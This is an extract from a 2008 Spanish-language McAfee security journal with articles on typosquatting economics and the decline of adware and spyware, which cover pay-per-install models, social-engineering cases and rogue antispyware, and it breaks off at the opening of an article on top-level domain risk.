en lugar de eso, el typosquatter acaba vendiendo espacios de publicidad a Bank of America, sin que éste, al menos inicialmente, se percate. ¿Cómo es esto posible? Los typosquatters no venden directamente el espacio a los anunciantes. (Imagínese la conversación: “Nos gustaría mostrar sus anuncios en nuestro sitio de typosquatting”. “¿Que quiere poner nuestros anuncios dónde?”) En su lugar, los typosquatters venden sus espacios a redes publicitarias, que a su vez buscan anunciantes. La mayor red en este espacio es Google, cuyo producto AdSense for domains y otros productos de afiliación de dominios sirven anuncios en más del 80 por ciento de los sitios de typosquatting recientemente descubiertos por la tecnología SiteAdvisor.
El futuro de los typosquatters En junio de 2008, la Corporación de Internet para Números y Nombres Asignados (ICANN) aprobó un documento para que se acelerase el proceso de creación de más dominios de nivel superior. Además de los dominios familiares a la mayoría de los usuarios, ya existen dominios menos utilizados como .info, .biz, .museum y .travel. No pasará mucho tiempo antes de que veamos nuevos dominios como .nyc o .lib (como algunos han sugerido). Más dominios de nivel superior significan más oportunidades de ciberocupación (para poder registrar con exactitud marcas comerciales conocidas o para crear variaciones tipográficas de nombres famosos). Cuando los usuarios solicitan estos dominios, ya sea en intentos equivocados de alcanzar sitios “reales” o en intentos fallidos de escribir direcciones verdaderas de sitios, los typosquatters pueden colarse con sus intrusos ilegales. Pero existen indicios de que el typosquatting no tardará en caer en declive. Uno de ellos es que algunos sitios Web importantes han tomado medidas para protegerse a sí mismos y a sus clientes de los typosquatters. Por ejemplo, en 2006, Neiman Marcus demandó al registrador de dominios Dotster. Neiman Marcus alegó que Dotster registró numerosos dominios que infringían las marcas de Neiman Marcus, mostrando los anuncios para maximizar sus ingresos desde estos sitios de typosquatting. El argumento de Neiman Marcus fue que Dotster actuó no sólo como registrador para estos dominios sino también como registrante, ya que eligió qué dominios registrar y recogió los beneficios de los anuncios resultantes. El caso se resolvió en 2007 en términos privados y Neiman Marcus ha continuado demandando desde entonces a otros ciberocupas de envergadura. (Una revelación: fui asesor de Neiman Marcus en algunos de estos casos.) Verizon y Microsoft también han estado atentos en litigios similares. Por una parte, estos casos no son especialmente frecuentes. Pero las indemnizaciones que establece la ACPA (un mínimo de 1.000 dólares por dominio) pueden obligar a los typosquatters a desembolsar mucho dinero por sus infracciones a gran escala. Sólo Microsoft ha recibido más de 2 millones de dólares en indemnizaciones por typosquatting.
de anunciantes y propietarios de marcas comerciales. Si Google dejara de financiar el typosquatting, los typosquatters tendrían muchos menos incentivos para registrar dominios ilegales; es probable que ninguna otra red publicitaria les pague tanto como lo hace Google. (Una revelación: soy colaborador de la defensa en la demanda colectiva de propietarios de marcas comerciales de Vulcan Golf y otros contra Google y otros, en relación a la responsabilidad de Google por los sitios de typosquatting en los que Google paga por colocar anuncios.)
Defensas Aunque las batallas de typosquatting continúan, los usuarios preocupados pueden hacer mucho para protegerse. En primer lugar, tenga cuidado cuando teclee. Esté atento al typosquatting, especialmente cuando solicite un sitio difícil de deletrear. Tratar de adivinar un nombre de dominio puede que no sea la mejor opción; considere en su lugar la utilización de un motor de búsqueda. En segundo lugar, tras llegar a un sitio, mire dos veces antes de continuar. ¿Es éste de verdad el sitio al que quería llegar? ¿Se trata de un enlace normal o un anuncio pagado? ¿Debería este sitio del Gobierno tener realmente un .com, o tal vez el correspondiente .gov? Un poco de sentido crítico puede servirle como defensa contra el typosquatting u otros ataques. El software adecuado también puede ayudar a proteger a los usuarios contra los typosquatters. La tecnología SiteAdvisor identifica muchos sitios de typosquatting. Un servicio de protección tipográfica, como OpenDNS, proporciona una protección adicional. Los motores de búsqueda normalmente ofrecen ayuda del tipo: “Quizás quiso decir ... ” con la corrección hecha, de modo que los usuarios pueden evitar muchos sitios de typosquatting realizando búsquedas en lugar de escribir nombres de dominios directamente en la barra de direcciones del navegador.
Benjamin Edelman es profesor adjunto en Harvard Business School, donde estudia mercados electrónicos y fraude en línea. También es consejero especial del servicio SiteAdvisor de McAfee, donde ofrece una perspectiva independiente para complementar las puntuaciones del sitio SiteAdvisor. Aunque es un mecanógrafo rápido y preciso, el profesor Edelman se ha embarcado ocasionalmente en aventuras involuntarias de navegación.
Además, existen rumores persistentes que sugieren que las redes publicitarias más importantes, particularmente Google, podrían abandonar la industria del typosquatting. Una reciente demanda colectiva de propietarios de marcas comerciales ha puesto en tela de juicio el papel de Google en la financiación de la industria del typosquatting, ya que colocación de estos anuncios en sitios de typosquatting ha sido una fuente constante de reclamaciones
NOTAS 1 “Large-Scale Registration of Domains with Typographical Errors,” (Registro de dominios a gran escala con errores tipográficos) Enero de 2003. Harvard Law School. (http://cyber.law.harvard.edu/archived_content/people/edelman/typo-domains/)
APÉNDICE Ejemplos de sitios de typosquatting: Cartoonnetwork.com Entre los más de 80.000 dominios encontrados en la inspección de mayo de 2008 de SiteAdvisor, aparecen estas variantes de typosquatting para cartoonnetwork.com: ccartoonnetwork.com dcartoonnetwork.com ncartoonnetwork.com cfartoonnetwork.com ceartoonnetwork.com
ckartoonnetwork.com jcartoonnetwork.com vcartoonnetwork.com caertoonnetwork.com caortoonnetwork.com
cairtoonnetwork.com cuartoonnetwork.com acartoonnetwork.com bcartoonnetwork.com canrtoonnetwork.com
OTOÑO 2008
37
¿Qué ha sido del adware y el spyware? Aditya Kapoor
El adware y el spyware son dos de las principales herramientas que se utilizan en Internet para marketing y distribución de distribuir publicidad. Estas aplicaciones suelen aprovecharse de metodologías de ingeniería social y a menudo se adhieren a aplicaciones de freeware o shareware que el usuario desea descargar y que por lo demás sí son útiles. Lo habitual es que las aplicaciones no deseadas incluyan acuerdos de licencia de usuario final (EULA) que supuestamente definen su comportamiento, pero en general la descripción no es explícita y no hace sino confundir al usuario y abrir la puerta a otras trampas de ingeniería social. En la primera mitad de esta década, se produjo un crecimiento exponencial del adware y el spyware —denominados con frecuencia programas no deseados o PUP—. Sin embargo, a partir de 2005 su número ha decrecido de forma constante. En este artículo analizaremos los principales cambios en los modelos de compensación online que están provocando este descenso. En su mayoría, el adware y el spyware actúan de formas diferentes: el primero funciona con aplicaciones más limpias y un mejor modelo de consentimiento del usuario desarrollados por las principales firmas de adware; el segundo es a veces malintencionado y con frecuencia se considera malware de tipo troyano. Esta división relativamente clara ha ayudado a mantener reducido el número de aplicaciones de adware y spyware. Por lo tanto, si estos PUP ya no constituyen ninguna amenaza, ¿desaparecerán pronto para siempre? Para responder a esta pregunta, examinaremos el cambiante panorama de amenazas y el papel que desempeña la ingeniería social.
Definiciones Los términos adware y spyware se emplean a menudo de manera imprecisa e indistinta, lo cual suele generar confusión. Aquí nos ceñiremos a las definiciones que propone la Coalición Antispyware (ASC, Anti-Spyware Coalition)1.
38
McAFEE SECURITY JOURNAL
•
Adware Tipo de software publicitario con capacidad para distribuir contenido publicitario de un modo o en un contexto que puede resultar inesperado e inoportuno para el usuario. El documento Risk Model (Modelo de riesgos) de la ASC detalla muchos de los comportamientos susceptibles de ser considerados inesperados o inoportunos. Además, numerosas aplicaciones de adware realizan funciones de rastreo y, por lo tanto, también pueden clasificarse como tecnologías de seguimiento. Si hay consumidores que se oponen a este seguimiento, no les interesa la publicidad que genera el programa o les molesta su efecto sobre el rendimiento del sistema, lo más probable es que deseen eliminar el adware. Por su parte, puede que otros usuarios prefieran conservar determinados programas de adware si su presencia sufraga el coste del producto o servicio que desean o si los anuncios les resultan útiles, como cuando suponen una alternativa o complemento a lo están estudiando o buscando.
•
Spyware En sentido estricto, el término spyware se utiliza para referirse al software de seguimiento que se instala sin el correspondiente aviso, consentimiento o control del usuario. En un sentido más amplio, se utiliza con el significado que la ASC otorga a “spyware (y otras tecnologías potencialmente no deseadas)”: tecnologías que se instalan sin el correspondiente consentimiento del usuario o de formas que merman su control sobre: – Cambios fundamentales que afectan a su experiencia, a su privacidad o a la seguridad del sistema – El uso de los recursos del sistema, incluso qué programas se instalan en el equipo – La recopilación, utilización y distribución de información personal o confidencial
Al advertir que el término spyware ha perdido en gran medida su significado exacto, los miembros de la ASC han decidido limitar el uso de “spyware” (en su sentido estricto) a los documentos técnicos. Igualmente, en vista de la imposibilidad de evitar las connotaciones más amplias derivadas del uso popular, la ASC también admite la existencia de una interpretación general que incluye todos los PUP. En este artículo, el término spyware no se emplea nunca en su sentido amplio, sino siempre en sentido estricto, es decir, como software relacionado con marketing. Para designar programas espía puros, como los registradores de pulsaciones, utilizamos el término software de supervisión.
Un rápido despegue El adware y el spyware captaron nuestra atención en el año 2000 con la aparición de Adware-Aureate, que utilizaba el historial de navegación del usuario para mostrar anuncios. Este programa motivó la creación de una de las primeras aplicaciones antispyware, OptOut de Gibson Research Corp2. El crecimiento del adware y el spyware comenzó a ser notable hacia finales de 2004 y alcanzó su apogeo en 2005 (véanse las Figuras 1 y 2). Su principal objetivo era generar ingresos instalándose en el escritorio de millones de usuarios (mediante el modelo de pago por instalación) y mostrar anuncios (con el modelo de pago por clic). Durante estos años la industria del adware y el spyware floreció por la gran cantidad de ingresos que generaba la publicidad. Cada vez que un usuario hacía clic en un determinado anuncio, el anunciante recibía una comisión.
Modelos de compensación y advertencias El adware y el spyware utilizan dos importantes modelos de compensación para la publicidad online. Ambos funcionan bien en un mundo ideal, pero ¿corren la misma suerte en un mundo donde hay personas malintencionadas? Analicemos cómo puede sacarse provecho de estos modelos.
Pago por instalación: el modelo del lado cliente3 En el modelo de pago por instalación (PPI), las empresas que venden productos o servicios pagan al distribuidor de adware por mostrar los anuncios. A su vez, el distribuidor de adware paga a personas o afiliados por distribuir su adware en paquetes o por otros medios. (ZangoCash, por ejemplo, paga entre 0,75 y 1,45 dólares en EE. UU. por cada unidad de adware instalada4). Al final el software debe instalarse en el equipo del cliente. El modelo PPI normalmente lleva un seguimiento de las instalaciones de software mediante un intermediario concreto. Es decir, si Fernando Fernández tiene en su sitio Web un instalador de adware basado en PPI y otro usuario descarga e instala ese software a través de ese sitio, Fernando recibirá una cantidad determinada de dinero. Para incrementar las descargas de su sitio, es posible que Fernando intente intensificar el tráfico con contenido que despierte interés, como títulos llamativos, vídeos o imágenes para adultos, juegos gratuitos y tonos de llamada. Con el aumento del tráfico y los ingresos, puede que Fernando decida aprovechar alguna vulnerabilidad para instalar
la aplicación de adware sin el conocimiento de los usuarios. Antes de instalarse, muchas de estas aplicaciones muestran un EULA, sin embargo, para evitar la preocupación de los visitantes, seguramente Fernando resuelva retocar la aplicación para suprimir el EULA y elevar el número de instalaciones. En este momento, si Fernando es un hacker experimentado, podría replicar este modelo en miles de sitios no seguros para multiplicar sus instalaciones y beneficios de forma exponencial. Benjamin Edelman, redactor de McAfee Security Journal, describe una situación real de este tipo en su sitio Web5. El modelo de compensación PPI demostró ser muy lucrativo para programadores e individuos malintencionados, algo que sin duda contribuyó al enorme crecimiento del adware y el spyware. Este modelo puede utilizarse con numerosos vectores de instalación, que se dividen en dos categorías generales: •
Ingeniería social Precisa la interacción del usuario y cuenta con que éste instale y, en algunos casos, incluso propague el software. El número de métodos de ingeniería social tiene como único límite la imaginación de los agresores, capaces de atraer incluso a los usuarios más desconfiados. En el ejemplo de Fernando Fernández, ofrecer juegos gratuitos o tonos de llamada es un cebo que mucha gente no puede resistir. Lo que el usuario decide en última instancia es asumir el riesgo o quedarse sin el regalo.
Adware 5.000 4.000 3.000 2.000 1.000 0 2000
2001
2002
2003
2004
2005
2006
2007
2008 previsión
2007
2008 previsión
Figura 1: El crecimiento del adware alcanzó su apogeo en 2005. (Fuente: McAfee Avert Labs)
Spyware y software de supervisión 300 250 200 150 100 50 0 2000
2001
2002
2003
2004
2005
2006
Spyware Programas de supervisión
Figura 2: El spyware y los programas de supervisión también han experimentado un descenso general desde 2005, pero prevemos un repunte para finales de 2008. (Fuente: McAfee Avert Labs)
OTOÑO 2008
39
•
Ataques que aprovechan vulnerabilidades Lo habitual es que con estos ataques la instalación de adware no requiera ninguna interacción humana, pero en muchos casos se atrae al usuario con técnicas de ingeniería social para que visite sitios Web malintencionados que albergan este tipo de ataques.
Pago por clic: el modelo del lado servidor6 El modelo de pago por clic (PPC) presenta dos variantes: anuncios patrocinados y anuncios por contenido. El modelo PPC no exige la instalación de ningún programa de adware ni spyware en el sistema del usuario, pero quizá sí necesite que el usuario introduzca información para que el contexto—por ejemplo, los resultados del motor de búsqueda—presente los anuncios correspondientes. Los anuncios por contenido de Google, por ejemplo, funcionan con el modelo PPC. Algunos de los mecanismos más utilizados para distribuir contenido PPC son: •
Anuncios de banner Los anuncios se muestran en un banner o en un espacio predefinido. Este contenido puede variar.
•
Anuncios emergentes en primer o segundo plano Los anuncios se presentan en ventana distintas, lo que resulta molesto para el usuario.
•
Anuncios en Flash Son similares a los anuncios de banner, pero utilizan animaciones Flash para diversificar el contenido.
El modelo PPC es capaz de funcionar en un entorno mucho más controlado que permite al sitio Web que incluye los anuncios elegir el mecanismo de distribución. Aunque el modelo PPC está basado en servidor y puede parecer más seguro, no es del todo infalible. Los timadores disponen de técnicas engañosas para estafar a los usuarios7. Si tenemos en cuenta que gran parte del contenido del anuncio está almacenado en servidores y que utiliza JavaScript, Flash y otras tecnologías con contenido multimedia, no resulta difícil insertar publicidad malintencionada en su secuencia8, 9. En un caso de este tipo, una red publicitaria propiedad de Yahoo distribuía sin saberlo anuncios de banner malintencionados que acaban descargando troyanos en el equipo del usuario. En este caso concreto, los anuncios de banner se mostraban en sitios Web como MySpace y PhotoBucket. Estos anuncios malintencionados se introducían inadvertidamente en la red publicitaria de Yahoo. También hemos observado que los clics del usuario se “secuestran” mediante envenenamiento de caché DNS10. Sin embargo, en estos casos los usuarios no se ven directamente afectados; el más vulnerable a estas amenazas es el ISP o el servidor que contiene los anuncios. Para restarle fuerza a los vectores de ataque que aprovechan estos modelos de compensación, vamos a analizar brevemente el importante papel que desempeña la ingeniería social en este mercado electrónico que promete infinitas posibilidades de generar ingresos.
40
McAFEE SECURITY JOURNAL
Aspectos de la ingeniería social Los piratas informáticos siempre buscan el eslabón más débil de la cadena de seguridad, que invariablemente son las personas. — Kevin Mitnick (2007)11 Sea cual sea el modelo de adware que utilicen los desarrolladores, el principal factor de éxito reside en los usuarios. En nuestro ejemplo de Fernando Fernández, la causa de que se infectasen los equipos fue que los usuarios visitaron el sitio Web malicioso incitados por las tácticas de ingeniería social de Fernando. Una razón del frecuente éxito de la ingeniería social es que muchas personas confían en lo que ven y, por naturaleza, no recelan de algunas actividades en la Web. Los ingenieros sociales malintencionados saben cómo aprovecharse de la naturaleza humana. Un estudio de casos reales llevado a cabo en el Departamento de Interior estadounidense señala que el 84% de los ministerios atribuye diversas brechas de seguridad a errores humanos, errores que el 80% achaca a la falta de formación o conocimientos sobre seguridad o a la omisión de los procedimientos12. Cientos de miles de programas de malware utilizan ingeniería social para instalarse en los equipos de los usuarios: éste es uno de los vectores más frecuentes de distribución de malware. Matthew Braveman clasifica los distintos vectores de instalación en cuatro categorías principales13. Según su estudio, casi un tercio del malware se instala mediante métodos de ingeniería social. El adware y el spyware han adoptado muchas metodologías conocidas de ingeniería social y han inventado técnicas nuevas para distribuir su software. La ingeniería social es el vector de instalación preferido del modelo PPI y el que ofrece más opciones para distribuir adware y spyware. Estas aplicaciones pueden distribuirse con mecanismos aparentemente inocuos, como paquetes de freeware, o con mecanismos sospechosos, como spam o datos adjuntos a mensajes de correo electrónico con texto engañoso. Por ejemplo, un usuario que desee un programa de freeware puede, a sabiendas, instalar adware para utilizar los servicios gratuitos. Aun si la instalación se produce a través de un ataque que aprovecha alguna vulnerabilidad o por spam directo, es posible que las empresas de seguridad tampoco califiquen el software como malintencionado porque el proveedor afirmará que no tiene nada que ver con la distribución y que alguien se está aprovechando de su software.
Si tenemos en cuenta que gran parte del contenido del anuncio está almacenado en servidores y que utiliza JavaScript, Flash y otras tecnologías con contenido multi media, no resulta difícil insertar publicidad malintencionada en su secuencia.
Sitio Web de red social nivel de confianza alto Motor de búsqueda nivel de confianza bajo Usuario
Vínculo recibido a través de MI, correo electrónico, spam nivel de confianza muy bajo
Sitio Web de ingeniería social (p. ej., ofrece vínculos a archivos MP3, vídeos para adultos, etc.)
Vínculo recibido a través del perfil de un amigo en sitio de red social, bloc de notas de Google, dominio de confianza, etc. nivel de confianza alto
Figura 3: Varios vectores exponen a los usuarios a programas malintencionados y no deseados.
Cuestión de confianza
Caso 2: anuncios de banner
La Figura 3 muestra cuatro situaciones en las que el usuario se expone a un sitio de ingeniería social. Aunque la ilustración es simple, puede ayudarnos a comprender los siguientes casos reales. La clave está en que cuanto mayor sea el nivel de confianza, más probabilidades de éxito tendrá una determinada técnica de ingeniería social. Veámoslo en detalle utilizando tres casos reales.
Los anuncios de banner pertenecen al dominio del modelo PPC. En estas situaciones el nivel de confianza es muy elevado, ya que los usuarios entran en un sitio de confianza que visitan a menudo. •
En 2006, The Washington Post denunció un anuncio de banner malintencionado en MySpace que distribuía adware y troyanos a millones de usuarios aprovechando las vulnerabilidades de los metarchivos de Microsoft Windows, para lo cual no hacía falta la intervención del usuario17.
•
En 2008, los anuncios de banner malintencionados han experimentado un aumento. El más reciente mientras se escribía este artículo fue un anuncio en Flash publicado en usatoday.com18. Sólo por visitar la página, los usuarios eran bombardeados con múltiples alertas falsas y de malware (una táctica de ingeniería social muy frecuente) para que descargaran una aplicación antispyware no autorizada denominada Malware Alert. (Los programas no autorizados pueden incluir PUP y también troyanos).
Caso 1: sitios Web de redes sociales Los sitios de redes sociales son de gran ayuda para los ingenieros sociales porque la mayoría de las personas que entran en ellos buscan hacer amigos o mantenerse en contacto. Puede que los ingenieros sociales establezcan relaciones para aumentar el factor de confianza, como en la parte superior de la Figura 3. El nivel de confianza suele ser muy elevado en esta categoría. Varios ataques destacados de ingeniería social se han aprovechado de esta confianza para instalar adware en los equipos de los usuarios: •
Visualizador de contenido para adultos de MySpace (nivel de confianza: medio). Este problema se producía cuando un usuario hacía clic en un anuncio emergente que mostraba imágenes de jóvenes con títulos como “Quiero que me quieran”14. Al hacer clic en estos anuncios se bajaba el software MySpace Adult Content que, según se ha sabido, descargaba adware.
•
Vídeo fraudulento de YouTube en MySpace (nivel de confianza: alto). A finales de 2006 WebSense denunció la publicación de un vídeo fraudulento de YouTube en múltiples perfiles falsos de MySpace15. Para ver el vídeo, hacía falta instalar ZangoCash.
•
Aplicación Secret Crush para Facebook (nivel de confianza: muy alto). En enero de 2008, Fortinet publicó una advertencia de seguridad sobre un widget malicioso denominado Secret Crush (Amor secreto) que intentaba instalar adware16. Esta táctica de ingeniería social funcionaba enviando primero una solicitud de Facebook titulada “Invitación de un amor secreto”. Al abrir la solicitud, el usuario tenía que instalar un widget para averiguar quién le enviaba la invitación. A continuación, antes de desvelar quién era el amor secreto, la solicitud pedía al usuario que reenviara la invitación a cinco amigos. Los más ingenuos reenviaban el mensaje a sus amigos y así creaban un gusano social. Después de todos estos pasos, lo único que veían las víctimas era un mensaje para descargar el adware Zango. Se dejaban llevar fácilmente por la situación porque su nivel de confianza era muy elevado.
Caso 3: otras tácticas sugerentes •
Mensajes de correo electrónico falsificados (nivel de confianza: bajo). Hubo un caso en que se enviaron masivamente mensajes falsificados de eBay con vínculos para descargar adware19. El factor de ingeniería social se encontraba en el contenido del mensaje, que “advertía” a los confiados usuarios de que había un problema con sus datos de facturación y de que tenían que actualizarlos descargando un determinado software.
•
Páginas de error falsas (nivel de confianza: medio). Algunos sitios Web mostraban mensajes de error falsos tipo “página no encontrada” y se ofrecían a resolver la situación descargando un componente ActiveX que instalaba WinFixer20.
•
Spam en el bloc de notas de Google (nivel de confianza: alto). Hace poco los timadores utilizaron otra técnica más de ingeniería social enviando vínculos de spam a páginas del bloc de notas de Google21. El hipervínculo tenía el formato www.google.com/ notebook/public/[IDusuario]/[bloqueado]. La gente es menos suspicaz si se trata del dominio google.com, por lo que se atreven a hacer clic en las páginas Web malintencionadas, que contienen numerosos vínculos a sitios para adultos o vídeos falsos. Finalmente éstos descargan varias aplicaciones antispyware no autorizadas.
OTOÑO 2008
41
Retirada silenciosa La falta inicial de normativas que regularan las aplicaciones de adware y spyware dio mucha libertad a los desarrolladores, tanto si su motivación era puramente económica como si era verdaderamente malintencionada. Al principio, los usuarios parecían protegidos porque el EULA les advertía de todos los efectos no deseados de estas aplicaciones. Pero muchas veces los EULA eran confusos, estaban incompletos o había que buscarlos. Al encontrarlos, eran difíciles de leer, a menudo por estar encerrados en ventanas diminutas en las que sólo cabían unas pocas palabras. Con una cortina de humo tan eficaz, ¿por qué han disminuido el adware y el spyware? Los factores que han contribuido son varios. •
Pleitos Debido al incremento de abusos de las aplicaciones de adware y spyware, los consumidores y otros demandantes han entablado diversos pleitos contra algunos distribuidores de envergadura.22,23,24,25,26,27. Varias sentencias judiciales han contribuido a limitar la cantidad de adware y spyware. Por ejemplo, en la resolución contra Zango12, el tribunal “exige que Zango controle a sus distribuidores terceros para asegurarse de que afiliados y subafiliados cumplen la decisión de la Comisión de Comercio Federal (FTC, Federal Trade Commission)”. El fallo también “prohíbe a Zango, directamente o a través de otros, aprovechar vulnerabilidades de seguridad para descargar software y le obliga a mostrar explicaciones claras y visibles, así como a obtener el consentimiento expreso de los consumidores antes de descargar el software en su equipo”. Estos fallos judiciales han servido para debilitar el método PPI y han supuesto un incentivo para que los distribuidores mejoren su comportamiento.
•
•
Concienciación pública y organismos del sector La FTC posee un sitio Web informativo28 que aconseja sobre cómo protegerse del spyware y denunciar sus abusos. La ASC también ofrece gran cantidad de información y detalles sobre esta amenaza29. Gracias al esfuerzo de estos grupos, los consumidores y legisladores comprenden mucho mejor las reglas y los problemas relacionados con la publicidad en Internet. Este conocimiento ha ayudado a reducir el número de aplicaciones no deseadas. Mala prensa y pleitos potenciales contra anunciantes relacionados con empresas de adware El dinero que hacía funcionar el mercado del adware y el spyware provenía inicialmente de anunciantes que recurrían a empresas de adware para mostrar los anuncios. Al principio, estas empresas de productos y servicios no investigaban a fondo la manera en que las empresas de adware distribuían su publicidad. En una resolución histórica dictada el 29 de enero de 200730 se establecía que “antes de contratar a una firma para la distribución de su publicidad, y de forma trimestral a partir de entonces, las empresas deben investigar cómo se distribuyen sus anuncios en Internet. Las empresas deben interrumpir inmediatamente el uso de los programas de adware que infrinjan las resoluciones alcanzadas o sus propias directivas de adware”.
42
McAFEE SECURITY JOURNAL
Dado que ahora los anunciantes conocen los riesgos asociados al modelo PPI (invasión de la intimidad, consentimiento impropio y otros), han comenzado a adoptar el modelo PPC, que no exige que haya ninguna aplicación en el sistema del usuario.
Aplicaciones no autorizadas Como los creadores de malware hacen dinero fácil con tácticas intimidatorias, tienden cada vez más a distribuir aplicaciones no autorizadas y troyanos de “alertas” falsas, que muestran errores o mensajes de infección falsos. En la mayoría de los casos, los troyanos de alertas falsas son los que descargan las aplicaciones no autorizadas que detectan claves de registro y archivos falsos como malware. A veces, son las propias aplicaciones no autorizadas las que introducen los archivos para detectarlos después; en estos casos, la aplicación no autorizada garantiza la clasificación como “troyano” (estos troyanos están incluidos en la Figura 4). También hemos observado muchos casos de adware instalado por troyanos. La categoría de troyano Downloader-UA es una familia que utiliza tácticas de ingeniería social para descargar programas falsos. Descubierta a finales de 2004, esta familia emplea vulnerabilidades del modo en que el Reproductor de Microsoft Windows Media utiliza la tecnología de gestión de derechos digitales embaucando a los usuarios para descargar archivos multimedia de diseño especial31,32. Esta misma familia de troyanos atacó de nuevo en 2008 persuadiendo a los usuarios de que se bajaran un reproductor de MP3 falso para oír una selección de temas, pero a la vez descargaba montones de adware en el sistema33. En comparación con años anteriores, el crecimiento de las aplicaciones no autorizadas (PUP y troyanos) ha sido exponencial en 2008 (Véase la Figura 4). Para medir la frecuencia de los productos antispyware no autorizados que distribuyen los troyanos Downloader, analizamos una serie de direcciones IP desde las que se iniciaban estas descargas. La consulta realizada en el dominio hosts-files.net devolvió 158 dominios asociados a una misma dirección IP34 (véase la Figura 5). Aplicaciones no autorizadas 1.000 500 0
2005
2006
2007
2008 previsión
PUP Troyano
Figura 4: A diferencia del adware y el spyware, las aplicaciones no autorizadas (PUP y troyanos) han aumentado drásticamente en 2008. (Fuente: McAfee Avert Labs)
Conclusión
Figura 5: Varios nombres de host están asignados a una sola dirección IP que distribuye aplicaciones localizadas no autorizadas.
Cada uno de los dominios que contiene la Figura 5 muestra un antispyware personalizado o un “limpiador del sistema” no autorizados. Las páginas también aparecen en varios idiomas. Al analizar 620 páginas, descubrimos que se habían creado páginas y aplicaciones en 24 idiomas, lo que indica que las amenazas se han extendido mucho más allá de los países angloparlantes. En más de una ocasión la misma IP estaba asociada a múltiples dominios, en algunos casos hasta 200 dominios diferentes. Una consulta de la palabra clave “FSA” (que hosts-files.net describe como una clase de dominios que albergan aplicaciones no autorizadas) devolvió cerca de 3.600 dominios que distribuyen aplicaciones no autorizadas35.
NOTAS 1 http://www.antispywarecoalition.org/documents/2007glossary.htm 2 OptOut (No participar), Gibson Research Corp. http://www.grc.com/optout.htm 3 http://en.wikipedia.org/wiki/Compensation_methods 4 (Fuente: sitio Web de Zango. http://www.cdt.org/headlines/headlines.php?iid=51 5 http://www.benedelman.org/news/062907-1.html 6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29 7 http://www.benedelman.org/ppc-scams/ 8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx 9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ 10 http://www.secureworks.com/research/threats/ppc-hijack/ 11 http://www.csc.com/cscworld/012007/dep/fh001.shtml 12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternal ExternalThreat%20Dudeck.ppt 13 http://download.microsoft.com/download/c/e/c/ cecd00b7-fe5e-4328-8400-2550c479f95d/Social_Engineering_Modeling.pdf 14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/ 15 http://securitylabs.websense.com/content/Alerts/1300.aspx 16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html 17 http://blog.washingtonpost.com/securityfix/2006/07/ myspace_ad_served_adware_to_mo.html 18 http://securitylabs.websense.com/content/Alerts/3061.aspx
Sólo desde el punto de vista estadístico, parece claro que el adware y el spyware están disminuyendo. Sin embargo, las sugerentes tácticas de ingeniería social que se utilizan para distribuir estos PUP siguen entre nosotros, distribuyendo troyanos y aplicaciones no autorizadas. Con el ascenso del modelo del lado servidor (PPC) en la distribución publicitaria, sin duda aparecerán tácticas mejoradas de ingeniería social que incitarán a los usuarios a hacer clic en estos anuncios y generar ingresos para los afiliados. La distribución de adware y troyanos seguirá ganando terreno en los sitios de redes sociales. Aunque el número total de programas de adware y spyware ha descendido, no prevemos que en un futuro próximo surjan soluciones fáciles para el problema de los programas no deseados. Siendo las empresas de adware quienes pagan estas instalaciones, su deber moral sería llevar un seguimiento de cada instalación y detener rápidamente cualquier mala distribución posible de su software. Pero ¿lo harán de verdad? El cambiante panorama de amenazas y el aumento de los troyanos con fines lucrativos nos obliga a permanecer atentos y enseñar a trabajadores y usuarios particulares a entender mejor lo que supone la amenaza de la ingeniería social.
Aditya Kapoor es investigador sénior en McAfee Avert Labs. Conoció la ingeniería inversa hace seis años cuando investigaba en la Universidad de Luisiana en Lafayette para su tesis de doctoral, que versó sobre un algoritmo de desensamblaje para resolver la ocultación de código. En McAfee, Kapoor se ha especializado en análisis de rootkits, comparación de códigos de bytes y análisis de comportamiento. Le gusta viajar y estudiar diferentes culturas y arquitecturas.
19 http://securitylabs.websense.com/content/Alerts/738.aspx 20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-just-filenot-found/ 21 http://www.cantoni.org/2008/06/04/google-notebook-spam 22 http://www.benedelman.org/spyware/nyag-dr/ 23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html 24 http://www.internetlibrary.com/cases/lib_case358.cfm 25 http://blogs.zdnet.com/Spyware/?p=655 26 http://www.ftc.gov/opa/2006/11/zango.shtm 27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm 28 http://onguardonline.gov/spyware.html 29 http://www.antispywarecoalition.org/ 30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html 31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html 32 http://vil.nai.com/vil/content/v_130856.htm 33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3srunning-rampant/ 34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches 35 http://hosts-file.net/?s=Browse&f=FSA
OTOÑO 2008
43
¿Cuál es el riesgo de los dominios de nivel superior? David Marcus
Los datos de McAfee SiteAdvisor revelan la variación del riesgo en función del área geográfica. En su excelente informe “Mapping the Mal Web, Revisited” (El mapa de los sitios Web peligrosos, revisión), publicado en el número de junio de 2008 de la revista McAfee Security Insights1, nuestro compañero Shane Keats examinaba con detenimiento la distribución en Internet de los sitios Web malintencionados. Para ello, utilizaba datos obtenidos mediante la tecnología McAfee® SiteAdvisor®. En el momento que vivimos, todos necesitamos saber por dónde se puede navegar y buscar información sin correr riesgos. Pero si Internet es realmente un enorme barrio digital, reflejo de cualquier gran ciudad del mundo, ¿cuáles son las calles por las que se puede transitar sin peligro? ¿Qué dominios presentan más riesgos? ¿Cuáles son los dominios de nivel superior (TLD) que incorporan más mejoras en cuanto a seguridad? ¿Y cuáles menos? ¿Qué palabras de búsqueda son más peligrosas? Estas son las preguntas, entre muchas otras, que se hacen los usuarios de Internet. El objetivo de la revista McAfee Security Journal es ayudarle a obtener respuestas mediante datos y análisis que le permitan tomar las decisiones más adecuadas. En este número, resumimos datos de amenazas recientes que afectan a dominios de nivel superior: tanto genéricos: .com, .info, .biz , entre otros, como de países: .cn, .ru, .br, etc. Examinamos en detalle no sólo los niveles de riesgo actuales de estos dominios en América, Europa y Asia, sino también su evolución en el último año. Hemos clasificado cada dominio TLD según su riesgo general y, a continuación, hemos realizado análisis adicionales de correo electrónico, seguridad en las descargas y la 